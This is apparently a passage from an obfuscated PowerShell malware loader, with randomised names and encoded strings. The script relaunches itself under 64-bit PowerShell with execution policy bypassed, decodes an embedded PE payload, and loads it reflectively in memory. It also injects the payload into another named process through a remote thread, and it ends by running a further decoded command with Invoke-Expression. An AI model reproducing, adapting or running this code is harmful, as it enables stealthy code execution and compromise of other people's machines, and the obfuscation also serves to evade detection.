[Parameter(Position = 0, Mandatory = $true)] [Int64] $EgQQNConBrV,
[Parameter(Position = 1, Mandatory = $true)] [Int64] $vXcCSVlHAJPf
)
[Byte[]]$esXmCdoHfyPxARZpND = [BitConverter]::GetBytes($EgQQNConBrV)
[Byte[]]$EXzqjUAQjBtWPIHJX = [BitConverter]::GetBytes($vXcCSVlHAJPf)
[Byte[]]$ClDrzkYVeKbyeH = [BitConverter]::GetBytes([UInt64]0)
if ($esXmCdoHfyPxARZpND.Count -eq $EXzqjUAQjBtWPIHJX.Count)
{
$UpqkcOEjw = 0
for ($BeZeQEUe = 0; $BeZeQEUe -lt $esXmCdoHfyPxARZpND.Count; $BeZeQEUe++)
{
$YoSoTrFF = $esXmCdoHfyPxARZpND[$BeZeQEUe] - $UpqkcOEjw
if ($YoSoTrFF -lt $EXzqjUAQjBtWPIHJX[$BeZeQEUe])
{
$YoSoTrFF += 256
$UpqkcOEjw = 1
}
else
{
$UpqkcOEjw = 0
}
[UInt16]$UhUkZYnDsebuXxRnnC = $YoSoTrFF - $EXzqjUAQjBtWPIHJX[$BeZeQEUe]
$ClDrzkYVeKbyeH[$BeZeQEUe] = $UhUkZYnDsebuXxRnnC -band 0x00FF
}
}
else
{
Throw
}
return [BitConverter]::ToInt64($ClDrzkYVeKbyeH, 0)
}
Function vNDVRBzRTZhi
{
Param
(
[Parameter(Position = 0, Mandatory = $true)] [Int64] $HMN,
[Parameter(Position = 1, Mandatory = $true)] [Int64] $yjiytjAKNdg
)
[Byte[]]$Zes = [BitConverter]::GetBytes($HMN)
[Byte[]]$enlcayEfWPxfeHVhUDZV = [BitConverter]::GetBytes($yjiytjAKNdg)
[Byte[]]$XOQkAIw = [BitConverter]::GetBytes([UInt64]0)
if ($Zes.Count -eq $enlcayEfWPxfeHVhUDZV.Count)
{
$OGHHifzplqpgRila = 0
for ($EZfdWugmh = 0; $EZfdWugmh -lt $Zes.Count; $EZfdWugmh++)
{
[UInt16]$dbGAJAkGhfV = $Zes[$EZfdWugmh] + $enlcayEfWPxfeHVhUDZV[$EZfdWugmh] + $OGHHifzplqpgRila
$XOQkAIw[$EZfdWugmh] = $dbGAJAkGhfV -band 0x00FF
if (($dbGAJAkGhfV -band 0xFF00) -eq 0x100)
{
$OGHHifzplqpgRila = 1
}
else
{
$OGHHifzplqpgRila = 0
}
}
}
return [BitConverter]::ToInt64($XOQkAIw, 0)
}
Function pSytWkLF
{
Param
(
[Parameter(Position = 0, Mandatory = $true)] [UInt64] $WDqmGEcBIrFM
)
[Byte[]]$fLVkXyjmkA = [BitConverter]::GetBytes($WDqmGEcBIrFM)
return ([BitConverter]::ToInt64($fLVkXyjmkA, 0))
}
Function zratHjJXxf
{
Param
(
[Parameter(Position = 0, Mandatory = $true)] [Int16] $mquKCOH
)
[Byte[]]$SDHxgh = [BitConverter]::GetBytes($mquKCOH)
return ([BitConverter]::ToUInt16($SDHxgh, 0))
}
Function hanAqvETmUGlzBlWSy
{
Param( [OutputType([Type])]
[Parameter( Position = 0)] [Type[]] $qplqlGbYGxTvTgyrSYYL = (New-Object Type[](0)),
[Parameter( Position = 1 )] [Type] $rVdvsPDmivnnpS = [Void] )
$IRmklMuaOyiZkw = [AppDomain]::CurrentDomain
$eZespMYMhNeIt = New-Object Reflection.AssemblyName( $( XRHWxMEePcnJxrpvlimQ 'Wm1uZG1rfG1sTG1kbW9pfG0=' 0x08 ) )
$KgCqeAFeTo = $IRmklMuaOyiZkw.DefineDynamicAssembly($eZespMYMhNeIt, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$JFrdjMWMS = $KgCqeAFeTo.DefineDynamicModule( $( XRHWxMEePcnJxrpvlimQ 'Wn1edn58YWpefHdmf3Y=' 0x13 ), $false)
$XNsSViZdeCoTgd = $JFrdjMWMS.DefineType( $( XRHWxMEePcnJxrpvlimQ 'fEh1VF1UVlBFVGVIQVQ=' 0x31 ), $( XRHWxMEePcnJxrpvlimQ 'QG9icHAvI1N2YW9qYC8jUGZib2ZnLyNCbXBqQG9icHAvI0J2d2xAb2JwcA==' 0x03 ), [System.MulticastDelegate])
$VdXvMpAnrIoYFQuat = $XNsSViZdeCoTgd.DefineConstructor( $( XRHWxMEePcnJxrpvlimQ 'ZWNkR1JUXlZbeVZaUhsXf15TUnVOZF5QGxdnQlVbXlQ=' 0x37 ), [System.Reflection.CallingConventions]::Standard, $qplqlGbYGxTvTgyrSYYL)
$VdXvMpAnrIoYFQuat.SetImplementationFlags( $( XRHWxMEePcnJxrpvlimQ 'Q2R/ZXh8dD0xXHB/cHZ0dQ==' 0x11 ))
$WnIZfxlZRoymLA = $XNsSViZdeCoTgd.DefineMethod( $( XRHWxMEePcnJxrpvlimQ 'm7ykvbm3' 0xd2 ), $( XRHWxMEePcnJxrpvlimQ 'weTz/fjyvbHZ+PX00+jC+Pa9sd/05sL9/uW9scf44+Xk8P0=' 0x91 ), $rVdvsPDmivnnpS, $qplqlGbYGxTvTgyrSYYL)
$WnIZfxlZRoymLA.SetImplementationFlags($( XRHWxMEePcnJxrpvlimQ 'Q2R/ZXh8dD0xXHB/cHZ0dQ==' 0x11 ) )
return $XNsSViZdeCoTgd.CreateType()
}
function wkOXGsOamphSrP
{
param
(
[Parameter(Position = 0 , Mandatory = $true)] [IntPtr] $OynlsNiFkgC,
[Parameter(Position = 1 , Mandatory = $true)] [IntPtr] $ddxsvl,
[Parameter(Position = 2 , Mandatory = $true)] [UInt32] $BmnMtsYAQpgHgAs,
[Parameter(Position = 3 , Mandatory = $true)] [System.IntPtr] $KHgKELkpT
)
$VSSslI = 0xa000
if([System.IntPtr]::Size -eq 4)
{
$VSSslI = 0x3000
}
if($BmnMtsYAQpgHgAs -eq 0)
{
return $false
}
$XDqw = LSjevmBSTK $ddxsvl $KHgKELkpT
$jGUsqSPQN = vNDVRBzRTZhi $OynlsNiFkgC $(pSytWkLF $BmnMtsYAQpgHgAs)
$zxDMct = [System.Runtime.InteropServices.Marshal]::PtrToStructure($jGUsqSPQN,[Type][fPuFahpIFbqHqZeAp.xVkotwIzCdIxoecFxxB])
while ($zxDMct.KNTfPafdZOCofQaJgEP)
{
$DHRfSia = vNDVRBzRTZhi $OynlsNiFkgC $(pSytWkLF $zxDMct.KNTfPafdZOCofQaJgEP)
$jzMfdLT = ($zxDMct.hPdWWZ - ([UInt32]8)) /2
$SFVeRvecbOterEYx = vNDVRBzRTZhi $jGUsqSPQN 8
for($LLzF=0;$LLzF -lt $jzMfdLT ; $LLzF++)
{
$txKTTOieVXEq = zratHjJXxf $([System.Runtime.InteropServices.Marshal]::ReadInt16($SFVeRvecbOterEYx))
if( $($txKTTOieVXEq -band $VSSslI) -eq $VSSslI)
{
$QjZhVJApAzECuhE = $txKTTOieVXEq -band 0xfff
$ocdrdt = vNDVRBzRTZhi $DHRfSia $QjZhVJApAzECuhE
$VlwpK = vNDVRBzRTZhi $([System.Runtime.InteropServices.Marshal]::ReadIntPtr($ocdrdt)) $XDqw
[System.Runtime.InteropServices.Marshal]::WriteIntPtr($ocdrdt,$VlwpK)
}
$SFVeRvecbOterEYx = vNDVRBzRTZhi $SFVeRvecbOterEYx 2
}
$jGUsqSPQN = vNDVRBzRTZhi $jGUsqSPQN $(pSytWkLF $zxDMct.hPdWWZ)
$zxDMct = [System.Runtime.InteropServices.Marshal]::PtrToStructure($jGUsqSPQN,[Type][fPuFahpIFbqHqZeAp.xVkotwIzCdIxoecFxxB])
}
return $true
}
function kFbjwpzZnuDCwsZQWb
{
param
(
[Parameter(Position = 0 , Mandatory = $true)] [UInt32] $TiPGvdwdLbIzlXpC,
[Parameter(Position = 1 , Mandatory = $true)] [IntPtr] $VQCkOGIn,
[Parameter(Position = 2 , Mandatory = $true)] [UInt32] $VDXx,
[Parameter(Position = 3 , Mandatory = $true)] [UInt32] $NcTsjIUZBxzLA,
[Parameter(Position = 4 , Mandatory = $true)] [bool] $cum,
[Parameter(Position = 5 , Mandatory = $true)] [ref] $ZMbJdukE
)
$ZMbJdukE.value = $false
$hwqSPWCcaurFZvXZWp = $viZTKqyHmTGGPGyQov::YNwUrMRhd( [UInt32]0x43A, $false, [UInt32]$TiPGvdwdLbIzlXpC )
if ( $hwqSPWCcaurFZvXZWp -ne 0 )
{
$wcqtYbiNQsDYttaJqMzt = $viZTKqyHmTGGPGyQov::gmXUzA( 0, $VDXx, 0x00001000 -bor 0x00002000, 0x04 )
if ( $wcqtYbiNQsDYttaJqMzt -ne 0 )
{
$TnpZEgU = $viZTKqyHmTGGPGyQov::ZFRmCPQieZVFTBTIEHDd()
$axcqEfGfjnHcK = $viZTKqyHmTGGPGyQov::KQRW( $TnpZEgU, $wcqtYbiNQsDYttaJqMzt, $VQCkOGIn, $VDXx, [ref]([UInt32]0 ) )
if ( $axcqEfGfjnHcK -eq $true )
{
$MbJzZADaCvmWaeWol = $viZTKqyHmTGGPGyQov::dGJfHfj( [IntPtr]$hwqSPWCcaurFZvXZWp, 0, $VDXx, 0x00001000 -bor 0x00002000, 0x40 )
if ( $MbJzZADaCvmWaeWol -ne 0 )
{
$RyDGw = [System.Runtime.InteropServices.Marshal]::PtrToStructure($wcqtYbiNQsDYttaJqMzt,[Type][fPuFahpIFbqHqZeAp.hCcDWybZKdaSN])
$lBiNAwTFUnSVeM = 0
if ( $cum -eq $true )
{
$lBiNAwTFUnSVeM = [System.Runtime.InteropServices.Marshal]::PtrToStructure($(vNDVRBzRTZhi $wcqtYbiNQsDYttaJqMzt $(pSytWkLF $RyDGw.lHrsl)), [Type][fPuFahpIFbqHqZeAp.aJhUaoOyxheuYqkt] )
}
else
{
$lBiNAwTFUnSVeM = [System.Runtime.InteropServices.Marshal]::PtrToStructure($(vNDVRBzRTZhi $wcqtYbiNQsDYttaJqMzt $(pSytWkLF $RyDGw.lHrsl)), [Type][fPuFahpIFbqHqZeAp.PtHwbkdrYOpsX] )
}
wkOXGsOamphSrP $wcqtYbiNQsDYttaJqMzt $MbJzZADaCvmWaeWol $lBiNAwTFUnSVeM.XmMXLkNENoDVv.sHSzhUl.lUYQYtL $(pSytWkLF $lBiNAwTFUnSVeM.XmMXLkNENoDVv.TsxFfuCtQaEfLHwz )
$axcqEfGfjnHcK = $viZTKqyHmTGGPGyQov::KQRW( $hwqSPWCcaurFZvXZWp, $MbJzZADaCvmWaeWol, $wcqtYbiNQsDYttaJqMzt, $VDXx, [ref]([UInt32]0 ) )
if ( $axcqEfGfjnHcK -eq $true )
{
$VNeGiJ = vNDVRBzRTZhi $MbJzZADaCvmWaeWol $( pSytWkLF ( $NcTsjIUZBxzLA ) )
$IrRGNCjoBT = $viZTKqyHmTGGPGyQov::yKiDOexBPaPwJ( $hwqSPWCcaurFZvXZWp, 0, 0, $VNeGiJ, 0, 0, 0 )
if ( $IrRGNCjoBT -ne 0 )
{
$ZMbJdukE.value = $true
}
}
}
}
$viZTKqyHmTGGPGyQov::aVugT( $wcqtYbiNQsDYttaJqMzt, ([UInt32]0), 0x00008000 ) | Out-Null
}
$viZTKqyHmTGGPGyQov::DhC( $hwqSPWCcaurFZvXZWp ) | Out-Null
}
return
}
function qvGPA
{
param
(
[Parameter(Position = 0 , Mandatory = $true)] [string] $MfBuC,
[Parameter(Position = 1 , Mandatory = $true)] [IntPtr] $LAll,
[Parameter(Position = 2 , Mandatory = $true)] [UInt32] $hlzkcQdJYWglzbEHisN,
[Parameter(Position = 3 , Mandatory = $true)] [UInt32] $JWFzvbZwhyTlyFTO,
[Parameter(Position = 4 , Mandatory = $true)] [bool] $RkpY,
[Parameter(Position = 5 , Mandatory = $true)] [ref] $NkDrjvaICuTHrzcLMvIE
)
$NkDrjvaICuTHrzcLMvIE.value = $false
$dQZ = XRHWxMEePcnJxrpvlimQ '6/Prqqiy+PDw' 0x9c
foreach ( $BJzmcaQXH in get-process $MfBuC )
{
$ZvRfkoGB = $BJzmcaQXH.id
if ( $RkpY -eq $true )
{
$ZvRfkoGB = 0;
$Nfgil = $false
foreach ( $ssDIsaHtuqLKDeaGvE in $BJzmcaQXH.modules )
{
if ( $ssDIsaHtuqLKDeaGvE.filename -eq $dQZ )
{
$Nfgil = $true
}
}
if ( $Nfgil -eq $false )
{
$ZvRfkoGB = $BJzmcaQXH.id
}
}
if ( $ZvRfkoGB -ne 0 )
{
if ( $BJzmcaQXH.mainwindowhandle -ne 0 )
{
$dBSTcOJGIABvrRESEB = 0
kFbjwpzZnuDCwsZQWb $ZvRfkoGB $LAll $hlzkcQdJYWglzbEHisN $JWFzvbZwhyTlyFTO $RkpY ([ref]$dBSTcOJGIABvrRESEB)
if ( [bool]$dBSTcOJGIABvrRESEB -eq $true )
{
$NkDrjvaICuTHrzcLMvIE.value = $true
break
}
}
}
}
return
}
[byte[]]$PhgTEOPwcrzNn = 0
$VnzyvGjTysySn = $false
$vGKTsfLUeCgH = XRHWxMEePcnJxrpvlimQ 'KEdldC1XbWlPYmplY3QgLUNsYXNzIFdpbjMyX09wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdC1PYmplY3QgT1NBcmNoaXRlY3R1cmUgLUVycm9yQWN0aW9uIFN0b3ApLk9TQXJjaGl0ZWN0dXJl' 0x00
$vGKTsfLUeCgH = Invoke-Expression $vGKTsfLUeCgH
$DnxXXvA = XRHWxMEePcnJxrpvlimQ 'moaEmg==' 0xb0
if ( $vGKTsfLUeCgH -like $DnxXXvA )
{
$HoSjWB = XRHWxMEePcnJxrpvlimQ 'IS0kdnQ=' 0x40
if ( $env:PROCESSOR_ARCHITECTURE -ne $HoSjWB )
{
$JXmjXQsQ = XRHWxMEePcnJxrpvlimQ 'CSYsJjs0ITwjMAkiPDsxOiImJToiMCcmPTA5OQkjZHtlCSU6IjAnJj0wOTl7MC0w' 0x55
if ($myInvocation.Line)
{
&"$env:WINDIR$JXmjXQsQ" -ExecutionPolicy ByPass -NoLogo -NonInteractive -NoProfile -NoExit $myInvocation.Line
}
else
{
&"$env:WINDIR$JXmjXQsQ" -ExecutionPolicy ByPass -NoLogo -NonInteractive -NoProfile -NoExit -file "$($myInvocation.InvocationName)" $args
}
exit $lastexitcode
}
for( $sODYqXdgNRiIZcVP = 0; $sODYqXdgNRiIZcVP -lt $JSavlCRkvJtfAgC.Length; $sODYqXdgNRiIZcVP++ )
{
$JSavlCRkvJtfAgC[$sODYqXdgNRiIZcVP] = $JSavlCRkvJtfAgC[$sODYqXdgNRiIZcVP] -bxor 0x71
}
[byte[]]$PhgTEOPwcrzNn = $JSavlCRkvJtfAgC
$VnzyvGjTysySn = $true
}
else
{
for( $WGP = 0; $WGP -lt $KdtMGBDf.Length; $WGP++ )
{
$KdtMGBDf[$WGP] = $KdtMGBDf[$WGP] -bxor 0xae
}
[byte[]]$PhgTEOPwcrzNn = $KdtMGBDf
}
[System.IntPtr]$NzmbiEzWGkPTb = 0
[System.IntPtr]$TVJDqmVERWgILwjbrzXh = 0
$gzvuNDnbub = $viZTKqyHmTGGPGyQov::ZFRmCPQieZVFTBTIEHDd()
try
{
$NzmbiEzWGkPTb = [System.Runtime.InteropServices.Marshal]::AllocHGlobal( $PhgTEOPwcrzNn.Length )
[System.Runtime.InteropServices.Marshal]::Copy( $PhgTEOPwcrzNn, 0, $NzmbiEzWGkPTb, $PhgTEOPwcrzNn.Length )
}
catch
{
return
}
$ARAgiHjvjNUXTks = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NzmbiEzWGkPTb,[Type][fPuFahpIFbqHqZeAp.hCcDWybZKdaSN])
$PJSui = 0
if ( $VnzyvGjTysySn -eq $true )
{
$PJSui = [System.Runtime.InteropServices.Marshal]::PtrToStructure($(vNDVRBzRTZhi $NzmbiEzWGkPTb $(pSytWkLF $ARAgiHjvjNUXTks.lHrsl)), [Type][fPuFahpIFbqHqZeAp.aJhUaoOyxheuYqkt] )
}
else
{
$PJSui = [System.Runtime.InteropServices.Marshal]::PtrToStructure($(vNDVRBzRTZhi $NzmbiEzWGkPTb $(pSytWkLF $ARAgiHjvjNUXTks.lHrsl)), [Type][fPuFahpIFbqHqZeAp.PtHwbkdrYOpsX] )
}
$TVJDqmVERWgILwjbrzXh = $viZTKqyHmTGGPGyQov::gmXUzA( 0, $PJSui.XmMXLkNENoDVv.OsTBbVQ, 0x00001000 -bor 0x00002000, 0x04 )
if( $TVJDqmVERWgILwjbrzXh -eq 0 )
{
return
}
$aDAaUTawwz = $viZTKqyHmTGGPGyQov::KQRW( $gzvuNDnbub, $TVJDqmVERWgILwjbrzXh, $NzmbiEzWGkPTb, $PJSui.XmMXLkNENoDVv.usf, [ref]([UInt32]0) )
if ( $aDAaUTawwz -eq $false )
{
return
}
$iJQvOLZT = $( vNDVRBzRTZhi $NzmbiEzWGkPTb $( pSytWkLF $ARAgiHjvjNUXTks.lHrsl ) )
if ( $VnzyvGjTysySn -eq $true )
{
$iJQvOLZT = vNDVRBzRTZhi $iJQvOLZT $( [System.Runtime.InteropServices.Marshal]::SizeOf( [Type][fPuFahpIFbqHqZeAp.aJhUaoOyxheuYqkt] ) )
}
else
{
$iJQvOLZT = vNDVRBzRTZhi $iJQvOLZT $( [System.Runtime.InteropServices.Marshal]::SizeOf( [Type][fPuFahpIFbqHqZeAp.PtHwbkdrYOpsX] ) )
}
for( $vTcsS = 0; $vTcsS -lt $PJSui.ieXTLzdPluakFNsUxjt.meHP; $vTcsS++ )
{
$kvfSlMRDhOwwCfRa = [System.Runtime.InteropServices.Marshal]::PtrToStructure( $iJQvOLZT,[Type][fPuFahpIFbqHqZeAp.UFRlSclRQl] )
$sYT = vNDVRBzRTZhi $NzmbiEzWGkPTb $( pSytWkLF $kvfSlMRDhOwwCfRa.AbkcPToa )
$LZwGLGsJzFaPXFSCn = vNDVRBzRTZhi $TVJDqmVERWgILwjbrzXh $( pSytWkLF $kvfSlMRDhOwwCfRa.aLroQpmk )
$aDAaUTawwz = $viZTKqyHmTGGPGyQov::KQRW( $gzvuNDnbub, $LZwGLGsJzFaPXFSCn, $sYT, $kvfSlMRDhOwwCfRa.YUaXybWigWHWb, [ref]([UInt32]0 ) )
if ( $aDAaUTawwz -eq $false )
{
return
}
$iJQvOLZT = vNDVRBzRTZhi $iJQvOLZT $([System.Runtime.InteropServices.Marshal]::SizeOf([Type][fPuFahpIFbqHqZeAp.UFRlSclRQl]))
}
$bFRUvPVqEcXIdHJSYteR = 0
qvGPA $(XRHWxMEePcnJxrpvlimQ 'ITw0KCs2ITY=' 0x44 ) $TVJDqmVERWgILwjbrzXh $PJSui.XmMXLkNENoDVv.OsTBbVQ $PJSui.XmMXLkNENoDVv.bpKrNcbQLvVIQfMH $VnzyvGjTysySn ([ref]$bFRUvPVqEcXIdHJSYteR)
if( [bool]$bFRUvPVqEcXIdHJSYteR -ne $true )
{
[UInt32]$rWPEu = 0
$dpWn = $viZTKqyHmTGGPGyQov::ghsckiHLNVy( $gzvuNDnbub, $TVJDqmVERWgILwjbrzXh, $PJSui.XmMXLkNENoDVv.OsTBbVQ, 0x40, [ref]$rWPEu )
if ( $dpWn -eq $true )
{
wkOXGsOamphSrP $TVJDqmVERWgILwjbrzXh $TVJDqmVERWgILwjbrzXh $PJSui.XmMXLkNENoDVv.sHSzhUl.lUYQYtL $(pSytWkLF $PJSui.XmMXLkNENoDVv.TsxFfuCtQaEfLHwz)
$rkjPrPDxzxrNPLti = vNDVRBzRTZhi $TVJDqmVERWgILwjbrzXh $( pSytWkLF ( $PJSui.XmMXLkNENoDVv.bpKrNcbQLvVIQfMH ) )
$mgHOUd = hanAqvETmUGlzBlWSy @([System.IntPtr],[UInt32],[System.IntPtr]) ([bool])
$IKwObj = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( $rkjPrPDxzxrNPLti, $mgHOUd )
$IKwObj.Invoke( 0, 0, 0 ) | Out-Null
}
}
$YHrtFHtwjykGZRfRzNj = XRHWxMEePcnJxrpvlimQ 'UXNiO0F7f1l0fHN1YjZBf3glJElFfndyeWF1eWZvNmo2UHlkU3d1fjtZdHxzdWI2bTJJOFJzenNicz4/LWs2ajZZY2I7WGN6eg==' 0x16
$YHrtFHtwjykGZRfRzNj | Invoke-Expression
$viZTKqyHmTGGPGyQov::aVugT($TVJDqmVERWgILwjbrzXh,([UInt32]0),0x00008000) | Out-Null
$viZTKqyHmTGGPGyQov::DhC($gzvuNDnbub) | Out-Null